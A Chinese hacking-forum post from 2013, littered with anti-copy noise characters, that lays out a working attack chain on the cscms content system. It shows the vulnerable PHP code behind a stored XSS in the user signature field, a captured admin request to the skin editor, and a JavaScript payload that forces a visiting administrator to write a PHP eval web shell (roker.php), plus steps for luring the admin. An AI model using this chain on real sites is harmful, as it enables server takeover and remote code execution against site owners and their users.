|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题! h* `* ]& q& V' E" z4 }7 a
官网已经修补了,所以重新下了源码
+ T) q' H2 C# A, l因为 后台登入 还需要认证码 所以 注入就没看了。* `8 m8 @" c. b) b8 t7 z
存在 xss
0 g7 j8 A2 b) X1 Z: i# i. y漏洞文件 user/member/skin_edit.php0 ]- o. b6 @+ v$ N3 `. z$ g9 n- ?1 l8 \3 v
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
6 m8 h1 K* f! C. ^1 R* U( u
2 c% r$ x$ L7 X9 T2 u</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
* E& @9 k7 @- z ) p: I) Z) J* g
</textarea></td></tr>, T6 }3 \- D; C; D- r
+ b, J7 `3 Y/ Q% K& v
user/do.php 8 `- @, P6 n+ J7 ]! e* v' ?8 k+ |4 y9 W
1 ~/ O$ @8 k4 A& G: T9 ~* w
* i8 K5 Z) m9 W9 ?if($op=='zl'){ //资料( u8 A7 `6 I% @1 a' q. H m
- ~ l. E' l$ ?. R if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
8 E1 ~: K# V4 \, j exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));. C5 o4 V; ~& A0 b* A! J
, T, p. E6 B+ g1 ]# e! D, t d $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',. c1 I- T3 X$ j5 f0 `4 W9 _
P3 E$ X/ Y& Z0 b+ D CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
7 x0 `% v/ h& q9 c, E% U ~$ o5 d where CS_Name='".$cscms_name."'";
- E( V7 c+ e4 ?+ P& x6 z * D( P& P! n4 g' j
if($db->query($sql)){
! B1 E2 t X& y% c4 D* } 1 g" o0 K w- y! Z. b* _
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));( Y4 q. X5 e/ L
8 \' s+ X0 ~. i/ X3 @; q }else{1 f8 h0 f4 i) q @# f8 Z
/ t1 p0 T' w6 d& T% s$ f
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
: p: D$ S: C' V8 m) C! `6 h2 x0 l, L 6 c& B: U* q6 B' K0 Y6 h8 O
}+ H8 O( L3 E- O" m! M! X
' p3 C7 e }8 R! y( g; @. o: m
8 p% u3 n& R4 s, F没有 过滤导致xss产生。4 G; ?& N) L& D# H3 t1 ~% B2 N- m3 x3 f
后台 看了下 很奇葩的是可以写任意格式文件。。0 L6 s( M) g4 P- [
抓包。。9 F6 H( T5 g1 |4 \; |+ }# l* N
) m- ^& }# |7 p4 c% n5 K4 x
6 b( o5 o# ] |% [5 F3 a本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1& r' v' K( d2 o! R9 a% O. M# e
+ m* \) D8 Y2 f5 F$ P! ~. U
Accept: text/html, application/xhtml+xml, */*
# q. X+ C" Z/ Z9 \! [ q
) s/ |9 F$ r, A( eReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
/ e4 ~- S' k: o9 P; ]7 w$ m 6 Q7 {& } X& c
Accept-Language: zh-CN
2 I4 G* @; g& H
: Q5 I$ i# G9 O: r# Y! d* }User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0). ?- `) m' t- X0 b3 L \( O
' O' f* x. v# f# L, v5 BContent-Type: application/x-www-form-urlencoded
' e" x; c% u, q0 t& @6 F* J
* q5 U$ c$ R/ U! D: ]0 j1 ^Accept-Encoding: gzip, deflate0 x& \, p2 \3 c& @- k
. {* [; ~) I/ z' X4 Q" X
Host: 127.0.0.1
+ D1 Q4 E) \: M1 E ) E" c& t4 ~" L- @# V
Content-Length: 38& o1 I3 A; A* h1 z$ [8 I
2 O5 a' ?( q+ h; ?' @
DNT: 1
! C7 r- e5 C' m5 N o, b- c + C5 E6 t; Q: C/ n0 N1 `1 R. ~
Connection: Keep-Alive3 |5 V; `* i0 v! s( X5 z8 f
. L, {6 t, W6 X& qCache-Control: no-cache: I& A/ z1 J" v
: {0 S3 \( e& [" I; f5 Z3 ?Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
% W) T- T! \. R$ L% `7 B' W8 N 6 z; [) D) Q; n) j2 T; B0 w% }- i
) `' |! m( f& o) ~. U: K+ m8 a
name=aaa.php&content=%3Cs%3E%3Ca%25%3E. Y* e* |) F* G9 Q( O4 _
+ f) n) J4 c7 L0 N4 A+ s9 \
) U9 B* b! s/ f
6 T, k8 z; }, d
于是 构造js如下。
7 l" B1 w) Y4 e( Z4 B0 i3 m
. {8 y. q4 D2 N, ?$ V/ {本帖隐藏的内容<script> ; G- R$ _3 P+ |5 Z* u" b( {
thisTHost = top.location.hostname;
, o; p; u* a: ~' v6 g" x( u# p F
: L! O' J! i! dthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
# i/ }3 U2 { P! M% f7 J / K( O, Y( V8 U0 }' X' e7 |
function PostSubmit(url, data, msg) {
0 J; n( n3 O' [- i( r- \ var postUrl = url;$ f0 f6 Z- b" {. _6 \
/ A" v- G1 Q2 _ R var postData = data; + M3 [9 j7 k- x* t+ G0 h; U) k
var msgData = msg; 6 V5 D* B, Y" J) M2 U( k& w j
var ExportForm = document.createElement("FORM");
+ h8 I# d5 y4 J& c# }. [8 H4 g document.body.appendChild(ExportForm);
: ]2 [) g0 x, z ExportForm.method = "POST";
V" C/ P3 y0 B) \6 ? var newElement = document.createElement("input");
0 a- Q' n f% Q& l- t" N newElement.setAttribute("name", "name");
; u) p$ i, n# T) m ~5 ]+ _ newElement.setAttribute("type", "hidden"); + A6 M% }$ |, a/ A% z
var newElement2 = document.createElement("input");
- R& ]4 ^- i( P% g0 m8 u/ i; z! g newElement2.setAttribute("name", "content"); ! k: b" W0 n( Q Q( F
newElement2.setAttribute("type", "hidden"); 8 U) ]$ O9 W1 t. n0 |8 v: {- M- k2 Z
ExportForm.appendChild(newElement);
" N& l1 F/ v3 `3 Y2 P! c9 A( N- q ExportForm.appendChild(newElement2);
4 ^3 s2 M8 H6 q% t; T! [. f* e newElement.value = postData; $ K5 D1 e. e1 w: K7 q+ |6 i6 U
newElement2.value = msgData; ]* U7 A8 d# \. r( y
ExportForm.action = postUrl;
: x% o& Z5 d% h" ~ ExportForm.submit(); 2 V( \% j1 I5 m9 T- D$ `
};/ s4 H9 i0 g8 t7 o" m6 p
7 L/ g1 k9 R1 \ E+ b
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");( z$ r; Y) `( E% U" p; c/ V9 J5 k
6 p6 T! M3 ]5 d% F3 a</script>) E& x* Z5 S h& f
+ f m; @9 \$ H+ S6 O
q b L" |6 t
" j$ J3 J, D! _" rhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
: J. G7 z' r: p4 B/ a* @' E* \用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)7 Q: s% v5 e. e* J$ \- }. x* y
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
5 Y' o' `# U1 G3 Z |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对